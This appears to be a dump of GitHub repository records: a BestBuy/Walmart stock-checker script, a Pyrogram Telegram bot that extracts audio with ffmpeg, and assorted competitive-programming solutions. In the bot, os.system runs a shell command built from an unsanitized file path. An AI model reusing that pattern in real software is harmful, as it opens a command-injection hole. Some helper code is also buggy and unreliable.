webhook_dict[hook]\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n url = \"https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C\" + sku + \"%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get\"\r\n headers2 = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"accept-encoding\": \"gzip, deflate, br\",\r\n \"accept-language\": \"en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\",\r\n \"cache-control\": \"max-age=0\",\r\n \"upgrade-insecure-requests\": \"1\",\r\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36\"\r\n }\r\n page = requests.get(url, headers=headers2)\r\n link = \"https://www.bestbuy.com/site/\" + sku + \".p?skuId=\" + sku\r\n al = page.text\r\n search_string = '\"skuId\":\"' + sku + '\",\"buttonState\":\"'\r\n stock_status = al[al.find(search_string) + 33 : al.find('\",\"displayText\"')]\r\n product_name = sku_dict.get(sku)\r\n if stock_status == \"SOLD_OUT\":\r\n print(\"[\" + current_time + \"] \" + \"Sold Out: (BestBuy.com) \" + product_name + \"\\n\")\r\n stockdict.update({sku: 'False'})\r\n elif stock_status == \"CHECK_STORES\":\r\n print(product_name + \" sold out @ BestBuy (check stores status)\")\r\n stockdict.update({sku: 'False'})\r\n else: \r\n if stock_status == \"ADD_TO_CART\":\r\n print(\"[\" + current_time + \"] \" + \"In Stock: (BestBuy.com) \" + product_name + \" - \" + url)\r\n slack_data = {'content': current_time + \" \" + product_name + \" In Stock @ BestBuy \" + link}\r\n if stockdict.get(sku) == 'False':\r\n response = requests.post(\r\n webhook_url, data=json.dumps(slack_data),\r\n headers={'Content-Type': 'application/json'})\r\n stockdict.update({sku: 'True'})\r\n #print(stockdict)\r\n\r\nclass Walmart:\r\n\r\n def __init__(self, url, hook):\r\n self.url = url\r\n self.hook = hook\r\n webhook_url = webhook_dict[hook]\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n page = requests.get(url) \r\n al = page.text \r\n title = al[al.find('<meta property=\"twitter:title\" content=\"') + 40 : al.find('- Walmart.com\"/><script>window._wml.seoTags')]\r\n #print(title)\r\n if page.status_code == 200:\r\n if \"Add to cart\" in page.text:\r\n print(\"[\" + current_time + \"] \" + \"In Stock: (Walmart.com) \" + title)\r\n slack_data = {'content': current_time + \" \" + url + \" in stock at Walmart\"}\r\n if stockdict.get(url) == 'False':\r\n response = requests.post(\r\n webhook_url, data=json.dumps(slack_data),\r\n headers={'Content-Type': 'application/json'})\r\n stockdict.update({url: 'True'})\r\n else: \r\n print(\"[\" + current_time + \"] \" + \"Sold Out: (Walmart.com) \" + title + \"\\n\")\r\n stockdict.update({url: 'False'})\r\n\r\nfor url in urldict:\r\n hook = urldict[url]\r\n if \"bestbuy.com\" in url:\r\n print(\"BestBuy URL detected \" + hook + \"\\n\")\r\n parsed = urlparse.urlparse(url)\r\n sku = parse_qs(parsed.query)['skuId']\r\n sku = sku[0]\r\n bestbuylist.append(sku)\r\n headers = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"accept-encoding\": \"gzip, deflate, br\",\r\n \"accept-language\": \"en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\",\r\n \"cache-control\": \"max-age=0\",\r\n \"upgrade-insecure-requests\": \"1\",\r\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36\"\r\n }\r\n page = requests.get(url, headers=headers)\r\n al = page.text\r\n title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]\r\n sku_dict.update({sku: title})\r\n bbdict.update({sku: hook})\r\n\r\n elif \"target.com\" in url:\r\n targetlist.append(url)\r\n print(\"Target URL detected \" + hook + \"\\n\")\r\n elif \"walmart.com\" in url:\r\n walmartlist.append(url)\r\n print(\"Walmart URL detected \" + hook + \"\\n\")\r\nfor url in urldict:\r\n stockdict.update({url: 'False'}) #set all URLs to be \"out of stock\" to begin\r\nfor sku in sku_dict:\r\n stockdict.update({sku: 'False'}) #set all SKUs to be \"out of stock\" to begin\r\nwhile True:\r\n\r\n# Target\r\n for url in targetlist:\r\n try:\r\n hook = urldict[url]\r\n Target(url, hook)\r\n except:\r\n print(\"Some problem occurred. Skipping instance...\")\r\n\r\n# Best Buy\r\n for sku in bestbuylist:\r\n try:\r\n hook = bbdict[sku]\r\n BestBuy(sku, hook)\r\n except:\r\n print(\"Some problem occurred. Skipping instance...\")\r\n\r\n# Walmart \r\n for url in walmartlist:\r\n try:\r\n hook = urldict[url]\r\n Walmart(url, hook)\r\n time.sleep(2)\r\n except:\r\n print(\"Some problem occurred. Skipping instance...\")\r\n time.sleep(2)\r\n\r\n time.sleep(2)\r\n \r\n" } ]
1
Naveengnn/AudioExtractorBot
https://github.com/Naveengnn/AudioExtractorBot
76e88ba46c2cbaf12efc7605706ea564c348bfa3
aee5243b486a339e37860130e5207fb0a6db9193
c62a7060f8966da880f5dcd1a0ba5259f2985080
refs/heads/main
2023-06-10T14:36:25.977752
2021-07-02T02:44:52
2021-07-02T02:44:52
382,211,578
0
0
null
2021-07-02T02:43:55
2021-06-25T07:39:26
2021-06-21T12:49:57
null
[ { "alpha_fraction": 0.44736841320991516, "alphanum_fraction": 0.7017543911933899, "avg_line_length": 13.375, "blob_id": "83e5401d5513aa0b78f8b86ec56ff4b3d45ce52e", "content_id": "29c394bc9647e13baf4d73d6a205c3d5addb48ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 114, "license_type": "no_license", "max_line_length": 19, "num_lines": 8, "path": "/requirements.txt", "repo_name": "Naveengnn/AudioExtractorBot", "src_encoding": "UTF-8", "text": "Pyrogram==1.2.9\ntgcrypto\nrequests==2.25.1\ncertifi==2018.11.29\nchardet==3.0.4\nidna==2.8\nsix==1.12.0\nurllib3==1.26.5" }, { "alpha_fraction": 0.4846649467945099, "alphanum_fraction": 0.49591386318206787, "avg_line_length": 32.019046783447266, "blob_id": "92635dff561bc893525ece66b25f5d0a4d867f36", "content_id": "a56b8161b6027702d1758463e23a9f0076d119bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10463, "license_type": "no_license", "max_line_length": 115, "num_lines": 315, "path": "/bot/__main__.py", "repo_name": "Naveengnn/AudioExtractorBot", "src_encoding": "UTF-8", "text": "r\"\"\"\n _ _ _ \n / \\ _ _ __| |(_) ___\n / _ \\ | | | | / _` || | / _ \\\n / ___ \\ | |_| || (_| || || (_) |\n/_/ \\_\\ \\__,_| \\__,_||_| \\___/\n _____ _ _\n | ____|__ __| |_ _ __ __ _ ___ | |_ ___ _ __\n | _| \\ \\/ /| __|| '__| / _` | / __|| __| / _ \\ | '__|\n | |___ > < | |_ | | | (_| || (__ | |_ | (_) || |\n |_____|/_/\\_\\ \\__||_| \\__,_| \\___| \\__| \\___/ |_|\n ____ _\n | __ ) ___ | |_\n | _ \\ / _ \\ | __|\n | |_) || (_) || |_\n |____/ \\___/ \\__|\n\ntelegramChannel - t.me/IndianBots\ninitialRelease - 21/06/21\n\"\"\"\n\n# Inbuilt\nfrom os import mkdir, system as spawn, path, remove\nfrom threading import Thread\n\n# sitePackages\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\n# selfMade\nfrom config import Config\n\n\napp = Client(\n \"AudioExtractorBot\",\n api_id=Config.apiId,\n api_hash=Config.apiHash,\n bot_token=Config.botToken,\n)\n\n\ndef getFileSize(filePath: str):\n fileSize = path.getsize(filePath)\n if fileSize < 1024:\n return f\"{fileSize}B\"\n elif 1024 <= fileSize <= 1048576:\n return f\"{round(fileSize / 1024, 2)} KB\"\n elif 1048576 < fileSize < 1073741824:\n return f\"{round(fileSize / 1048576, 2)} MB\"\n elif 1073741824 < fileSize < 1073741824:\n return f\"{round(fileSize / 1099511627776, 2)} GB\"\n\n\ndef getThumbnail(thumbs: list):\n if not len(thumbs) >= 1:\n return f\"./bot/defaultThumb.jpg\"\n return app.download_media(thumbs[0].file_id)\n\n\ndef downloadProgress(current, total, message):\n del total\n app.edit_message_text(\n message.chat.id,\n message.message_id,\n f\"Downloading - `{current}` **Bytes**\",\n parse_mode=\"md\",\n )\n\n\ndef uploadProgress(current, total, message):\n app.edit_message_text(\n message.chat.id,\n message.message_id,\n f\"Uploading -\\n\"\n f\"`{current}/{total}` **Bytes**\\n\"\n f\"Progress - {current * 100 / total:.1f}%✅\",\n parse_mode=\"md\",\n )\n\n\ndef delMessage(message):\n try:\n app.delete_messages(\n message.chat.id,\n message.message_id,\n )\n except Exception as _:\n print(f\"[Errno 0] Can't delete message: '{message.message_id}'\")\n\n\ndef checkUserJoinStatus(user_id):\n try:\n channel = app.get_chat_member(\"IndianBots\", user_id)\n group = app.get_chat_member(\"IndianBotsChat\", user_id)\n except Exception as _:\n channel = False\n group = False\n if channel and group:\n return True\n return False\n\n\[email protected]_message(filters.video or filters.video_note or filters.document)\ndef extractAudio(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n infoMessage = app.send_message(\n message.chat.id,\n \"Downloading - 0%\",\n reply_to_message_id=message.message_id,\n )\n try:\n _ = message.video\n filePath = app.download_media(\n message.video.file_id,\n progress=downloadProgress,\n progress_args=(infoMessage,),\n )\n resultFile = f\"{message.from_user.id}-{message.message_id}\"\n spawn(f\"ffmpeg -i {filePath} -f mp3 -ab 192000 -vn -loglevel quiet ./extracted/{resultFile}.mp3\")\n if not path.exists(f\"./extracted/{resultFile}.mp3\"):\n return app.send_message(message.chat.id, \"Couldn't Extract The Audio From This File. Sorry!\")\n fileSize = getFileSize(f\"./extracted/{resultFile}.mp3\")\n fileThumb = getThumbnail(message.video.thumbs)\n infoMessageUpload = app.send_message(\n message.chat.id,\n \"Uploading - 0%\",\n reply_to_message_id=message.message_id,\n )\n app.send_audio(\n message.chat.id,\n f\"./extracted/{resultFile}.mp3\",\n caption=f\"{fileSize} | 192 kbps | @IndianBots\",\n reply_to_message_id=message.message_id,\n file_name=f\"{message.video.file_name.split('.')[0]}\",\n thumb=fileThumb,\n progress=uploadProgress,\n progress_args=(infoMessageUpload,),\n )\n Thread(target=delMessage(infoMessage)).start()\n Thread(target=delMessage(infoMessageUpload)).start()\n remove(f\"./extracted/{resultFile}.mp3\")\n remove(f\"{filePath}\")\n remove(f\"{fileThumb}\")\n except Exception as error:\n print(error)\n app.send_message(message.chat.id, \"Couldn't Extract The Audio From This File. Sorry!\")\n Thread(target=delMessage(infoMessage)).start()\n Thread(target=delMessage(infoMessageUpload)).start()\n\n\[email protected]_message(filters.command(\"start\"))\ndef startCommand(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n f\"Hoi **{message.from_user.first_name}**!\\n\"\n f\"I hope you are pushing healty through the `Covid19 Pandemic.`\\n\"\n f\"I am a **Audio Extractor Bot** made by **@Akash_am1**, i extract audio from videos and send it to you.\\n\"\n f\"For help - /commands\\n\"\n f\"Acknowledgment -\\n\\n\"\n f\"[Pyrogram](https://github.com/pyrogram/pyrogram)\\n\"\n f\"[FFmpeg](https://www.ffmpeg.org/)\\n\"\n f\"[Python](https://www.python.org/)\",\n disable_web_page_preview=True,\n parse_mode='md',\n )\n\n\[email protected]_message(filters.command([\"github\", \"source\"]))\ndef source_or_github(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n \"My Source Code Can be Found On Github...\\n\"\n \"https://github.com/BLUE-DEVIL1134/AudioExtractorBot\"\n )\n\n\[email protected]_message(filters.command(\"commands\"))\ndef commands(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n \"List of all Commands are given below -\\n\"\n \"\\n\"\n \"/help - Show this message\\n\"\n \"/commands - Show this message\\n\"\n \"/start - Restart/Refresh the bot\\n\"\n \"/help - Get help on how to use me.\",\n parse_mode=\"md\",\n )\n\n\[email protected]_message(filters.command(\"help\"))\ndef commands(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n \"It's real **easy** to use me.\\n\"\n \"All you need to do is send me a **video file** and i will **extract the audio** \"\n \"and send it to you.\",\n parse_mode=\"md\",\n )\n\n\nif __name__ == \"__main__\":\n print(\"Starting ...\")\n if not path.exists(\"./extracted\"):\n mkdir(\"./extracted\")\n app.run()\n" }, { "alpha_fraction": 0.7226277589797974, "alphanum_fraction": 0.7226277589797974, "avg_line_length": 33.25, "blob_id": "77769863ec9a50f2e12bc3c41441290fbff86ba9", "content_id": "ecb83cd26aa5a4dea581ad243aa080a433c4177e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 137, "license_type": "no_license", "max_line_length": 88, "num_lines": 4, "path": "/README.md", "repo_name": "Naveengnn/AudioExtractorBot", "src_encoding": "UTF-8", "text": "# #TODO\n\nFor now, please fork the repo and they connect it to your heroku account and deploy.<br>\nPlease **Give a Star** if you like it.\n" } ]
3
Teja-09/Programming
https://github.com/Teja-09/Programming
bac099f7a1ba1fca090828b998cc510b057e71c1
71e582beaa6183f6004da9b06262edfce4f74dd3
6bb482c40b19d28db34d2313b83b061839eb4547
refs/heads/master
2021-08-09T13:06:35.254225
2020-05-28T05:31:06
2020-05-28T05:31:06
184,236,394
0
0
MIT
2019-04-30T09:49:50
2019-12-17T10:11:27
2019-12-29T06:22:17
Java
[ { "alpha_fraction": 0.3019125759601593, "alphanum_fraction": 0.3265027403831482, "avg_line_length": 9.309859275817871, "blob_id": "38e56149f3ba0ac5cfb6fe24cb013e22213d06df", "content_id": "421ca52fcb76cd475f4b4ba9b1dbed7fed1778ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 732, "license_type": "permissive", "max_line_length": 38, "num_lines": 71, "path": "/April Long_2020/Strange Number.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\nusing namespace std;\n\nbool find(long long x, long long k) \n{\n \tint ct = 0;\n\t\n\twhile (x % 2 == 0)\n\t{\n\t\tct += 1;\n\t\tx /= 2;\n\t}\n\n\tfor(int i = 3; i <= sqrt(x); i += 2) \n\t{\n\t\twhile (x % i == 0) \n\t\t{\n\t \t\tct += 1;\n\t \t\tx /= i;\n\t\t}\n\t}\n\n\tif(x > 2)\n\t{\n\t\tct += 1;\n\t}\n\n\tif (ct >= k)\n\t{\n\t\treturn true;\n\t}\n\telse\n\t{\n \treturn false;\n \t}\n}\n\nint main()\n{\n int t;\n cin >> t;\n while(t--)\n {\n long long x, k;\n cin >> x >> k;\n\n if (k > 1)\n\t{\n \tif(find(x, k)) \n\t\t{\n \tcout << \"1\" << \"\\n\";\n \t}\n\t\telse \n\t\t{\n \tcout << \"0\" << \"\\n\";\n \t}\n }\n\telse \n\t{\n \tif (x > 1) \n\t\t{\n \tcout << \"1\" << \"\\n\";\n \t} \n\t \telse \n\t\t{\n \tcout << \"0\" << \"\\n\";\n \t}\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.3254376947879791, "alphanum_fraction": 0.35942327976226807, "avg_line_length": 19.5744686126709, "blob_id": "86b45ad2d414fe52067c4c77fe30c50f4b72883f", "content_id": "17e5d7bf103fa7e297e9168c46c0c5163d4e1f15", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "permissive", "max_line_length": 45, "num_lines": 47, "path": "/C++/May Long/Coronavirus Spread.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 17:03:30 2020\n\n@author: teja\n\"\"\"\n\nt = int(input())\nwhile(t):\n n = int(input())\n l = list(map(int,input().split()))\n count = 0\n maxi = 0\n mini = 10000\n size = len(l)\n for i in range(1, size):\n if l[i] - l[i-1] <= 2:\n count+=1\n else:\n count+=1\n if(count < mini):\n mini = count\n \n if(count > maxi):\n maxi = count\n \n count = 0\n \n if i == size-1 and l[i] - l[i-1] > 2:\n count+=1\n if(count < mini):\n mini = count\n \n if(count > maxi):\n maxi = count\n \n count = 0\n \n if(count != 0):\n count+=1;\n if(count < mini):\n mini = count\n \n if(count > maxi):\n maxi = count\n print(str(mini) + \" \" + str(maxi))\n t-=1\n " }, { "alpha_fraction": 0.4933774769306183, "alphanum_fraction": 0.5662251710891724, "avg_line_length": 14.149999618530273, "blob_id": "657df0b4b4c59466e5f407722e1c4bc606b3d2a2", "content_id": "0712cf5a1f905676c94bc64310719317e3856625", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "permissive", "max_line_length": 40, "num_lines": 20, "path": "/openlab_coding_preperation/list.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 14:45:05 2020\n\n@author: teja\n\"\"\"\n\n#l = list(map(int, input().split()))\n#print(l)\n\n#sq = list(map(lambda x: x*x , l))\n#print(sq)\n\n#fil = list(filter(lambda x: x%2==0, l))\n#print(fil)\n\ndict={1:3, 2:[5,6,7]}\n\nprint(len(dict[2]))\nprint(dict.get(3) == None)" }, { "alpha_fraction": 0.4672897160053253, "alphanum_fraction": 0.47975078225135803, "avg_line_length": 10.88888931274414, "blob_id": "1943053e8d7baf71254008ee62fe74e868c63adf", "content_id": "d2ba35d062c5f339c87f55f3bb451217c4259cfd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 321, "license_type": "permissive", "max_line_length": 28, "num_lines": 27, "path": "/C++/ZCO14003.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tlong long n,i;\n\tcin >> n;\n\tvector< long long >a(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tsort(a.begin(),a.end());\n\tlong long max = 0,temp = 0;\n\tfor(i=0;i<n;i++)\n\t{\n\t\ttemp = a[i]*(n-i);\n\t\tif(temp > max)\n\t\t{\n\t\t\tmax = temp;\n\t\t}\n\t}\n\tcout << max << \"\\n\";\n\t\n\t\n\t\n}\n" }, { "alpha_fraction": 0.40316206216812134, "alphanum_fraction": 0.4940711557865143, "avg_line_length": 12.368420600891113, "blob_id": "989e1e9fea57cc22c48bb315539c1fcbfc433344", "content_id": "b540fc941bcf2003a0a3157d4b25c53b89adaf5e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 253, "license_type": "permissive", "max_line_length": 33, "num_lines": 19, "path": "/C++/SUMMOD.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong long n,i,sum = 0,val = 1;\n\t\tcin >> n;\n\t\tfor(i=1;i<=n;i++)\n\t\t{\n\t\t\tval = (val * i) % 1000000007;\n\t\t\tsum += val; \n\t\t}\n\t\tcout << sum%1000000007 << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.42288556694984436, "alphanum_fraction": 0.5472636818885803, "avg_line_length": 10.222222328186035, "blob_id": "4d0c32bf3f0c47c35cd2685e88fd3bb71a0798e4", "content_id": "e53039a98f1c3f481a60ca38e6ade050439ef33f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 201, "license_type": "permissive", "max_line_length": 35, "num_lines": 18, "path": "/openlab_coding_preperation/stack.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:07:59 2020\n\n@author: teja\n\"\"\"\n\n# Stack\nl = [1, 2, 3, 4]\nl.append(10)\nprint(l.pop())\nprint(l)\n\n#Queue\nl = [1, 2, 3, 4]\nl.append(20)\nl.pop(0)\nprint(l)" }, { "alpha_fraction": 0.4938271641731262, "alphanum_fraction": 0.5061728358268738, "avg_line_length": 12, "blob_id": "b9c615a93e1ba0e1365dc49371660a258a68123f", "content_id": "d4551ebb95604de2f07c96c57eb22280bb4e3020", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 324, "license_type": "permissive", "max_line_length": 34, "num_lines": 25, "path": "/C++/ZCO13001.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tlong n;\n\tlong long rev = 0;\n\tcin >> n;\n\tvector < int >st(n);\n\tlong i,j;\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> st[i];\n\t}\n\tfor(i=0;i<n;i++)\n\t{\n\t\tfor(j=i+1;j<n;j++)\n\t\t{\n\t\t\trev += abs(st[i] - st[j]);\n\t\t}\n\t}\n\tcout << rev;\n}" }, { "alpha_fraction": 0.4045368731021881, "alphanum_fraction": 0.4328922629356384, "avg_line_length": 12.225000381469727, "blob_id": "6567bf38d734035fc317b32a6954c8a8c7cad1fa", "content_id": "d398727db5ca4a5132662527316e3f553bf4ab98", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 529, "license_type": "permissive", "max_line_length": 40, "num_lines": 40, "path": "/C++/dec_long_2.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main(){\n\tint t, i ,j, n;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint cone = 0;\n\t\tint czero = 0;\n\t\tint ans = 0;\n\t\tcin >> n;\n\t\tvector< int > a(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> a[i];\n\t\t\tif(a[i] == 0)\n\t\t\t{\n\t\t\t\t++czero;\t\n\t\t\t}\n\t\t\telse if(a[i] == 2)\n\t\t\t{\n\t\t\t\t++cone;\n\t\t\t}\n\t\t}\n\t\tczero = (czero * (czero+1))/2 - czero;\n\t\tcone = (cone * (cone+1))/2 - cone;\n\t\tif(czero < 0)\n\t\t{\n\t\t\tczero = 0;\n\t\t}\n\t\telse if(cone < 0)\n\t\t{\n\t\t\tcone = 0;\n\t\t}\n\t\tans = cone + czero;\n\t\tcout << ans << \"\\n\";\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.3907427489757538, "alphanum_fraction": 0.4144241213798523, "avg_line_length": 9.311111450195312, "blob_id": "590ef0ca190e1624765d5b36443ef04f9399a18e", "content_id": "fcff20b1cbea7571609c9a310913ed61df9b2987", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 929, "license_type": "permissive", "max_line_length": 49, "num_lines": 90, "path": "/C++/MergeSort.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\n\nvoid merge(vector< int > &a, int l, int m, int r)\n{\n\tint i, j, k;\n\tint n1 = m - l + 1;\n\tint n2 = r - m;\n\t\n\tint left[n1];\n\tint right[n2];\n\t\n\tfor(i=0;i<n1;i++)\n\t{\n\t\tleft[i] = a[l+i];\n\t}\n\t\n\tfor(i=0;i<n2;i++)\n\t{\n\t\tright[i] = a[m+i+1];\n\t}\n\t\n\ti = 0; j = 0; k = l;\n\t\n\twhile(i < n1 && j < n2)\n\t{\n\t\tif(left[i] <= right[j])\n\t\t{\n\t\t\ta[k] = left[i];\n\t\t\ti++;\n\t\t\tk++;\n\t\t}\n\t\telse\n\t\t{\n\t\t\ta[k] = right[j];\n\t\t\tj++;\n\t\t\tk++; \n\t\t}\n\t}\n\t\n\twhile(i < n1)\n\t{\n\t\ta[k] = left[i];\n\t\ti++;\n\t\tk++;\n\t}\n\t\n\twhile(j < n2)\n\t{\n\t\ta[k] = right[j];\n\t\tj++;\n\t\tk++;\n\t}\n\t\n}\n\n\nvoid mergesort(vector< int > &ar, int l, int r)\n{\n\tif(l < r)\n\t{\n\t\tint m = l + (r - l)/2;\n\t\t\n\t\tmergesort(ar, l, m);\n\t\tmergesort(ar, m+1, r);\n\t\t\n\t\tmerge(ar, l, m, r);\n\t}\n}\n\n\nint main()\n{\n\tint n, i;\n\tcin >> n;\n\tvector< int >arr(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> arr[i];\n\t}\n\t\n\tmergesort(arr, 0, n-1);\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << arr[i] << \"\\t\";\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.43533122539520264, "alphanum_fraction": 0.460567831993103, "avg_line_length": 11.230769157409668, "blob_id": "bf9c4798547dce4d6790bccce0d432c17f50e0d4", "content_id": "18e1ac792bd5dcb8ee6ac35cc952aeb16a8b3d31", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 317, "license_type": "permissive", "max_line_length": 27, "num_lines": 26, "path": "/C++/LOALL.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint n,i,x;\n\tcin >> n;\n\tvector<int> a(n);\n\tvector<int>b;\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t\twhile(a[i] > 0)\n\t\t{\n\t\t\tx = a[i] %10;\n\t\t\tb.push_back(x);\n\t\t\ta[i] = a[i] / 10;\n\t\t}\n\t}\n\tsort(b.begin(),b.end());\n\tfor(i=b.size()-1;i>=0;i--)\n\t{\n\t\tcout << b[i];\n\t}\n\t\n}" }, { "alpha_fraction": 0.4767441749572754, "alphanum_fraction": 0.49031007289886475, "avg_line_length": 11.560976028442383, "blob_id": "ade85a1f8f1305be5f8ed4088765fce2ed513771", "content_id": "6b8fda278c8fa7ad780bcfd8f94815858f672586", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 516, "license_type": "permissive", "max_line_length": 38, "num_lines": 41, "path": "/C++/Sort/Insertion.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": 